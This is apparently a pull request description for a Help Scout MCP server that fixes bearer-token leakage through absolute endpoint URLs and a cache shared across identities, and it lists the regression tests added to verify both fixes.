**NAS-1497, credential exfiltration via absolute endpoint URLs.** Axios lets an absolute URL in the request path replace `baseURL`, and the request interceptor attaches the bearer token to whatever destination that is, so a crafted HAL link or any endpoint coerced into an absolute URL could carry the credential off-host. Every public request method now validates that the endpoint resolves to the configured Help Scout origin before any request is made: cross-origin absolutes, protocol-relative URLs, and embedded credentials are rejected; same-origin absolutes stay legal (Help Scout's own pagination links and the v3 surface both resolve to the base origin). As defense in depth, the interceptor re-resolves the final request origin and refuses to attach `Authorization` on a mismatch. The Docs client gets the same validation against its own origin and drops its basic-auth credentials on mismatch.

**NAS-1496, identity-blind shared cache.** Cache keys carried only endpoint + params, so two identities in one process could share cached responses. Every key is now prefixed with a non-secret identity fingerprint (first 12 hex chars of SHA-256 over the authenticating credentials, derived from the same resolution the token request uses). The access token is additionally bound to the fingerprint that produced it: a mid-process credential rotation treats the old token as expired and forces a fresh exchange, closing the gap where an old identity's token could execute a request whose response was filed under the new identity's namespace.

Not affected: the remote worker path (`HelpScoutFetchClient` builds URLs by concatenation and never touches this cache).

## Verification

- 16 new regression tests (611 total, 607 passing, the single known local-`.env` environmental case aside): cross-origin and protocol-relative rejection across every read and write method with the network disabled, embedded-credentials rejection, a same-origin HAL next link still authenticating, two-identity cache isolation for both clients, no raw key material in cache keys, and rotation-under-live-client forcing a new OAuth exchange.
- Type-check and lint clean.
<!-- devin-review-badge-begin -->

---

<a href="https://app.devin.ai/review/drewburchfield/help-scout-mcp-server/pull/70" target="_blank">
  <picture>
    <source media="(prefers-color-scheme: dark)" srcset="https://static.devin.ai/assets/gh-open-in-devin-review-dark.svg?v=1">
    <img src="https://static.devin.ai/assets/gh-open-in-devin-review-light.svg?v=1" alt="Open in Devin Review">
  </picture>
</a>
<!-- devin-review-badge-end -->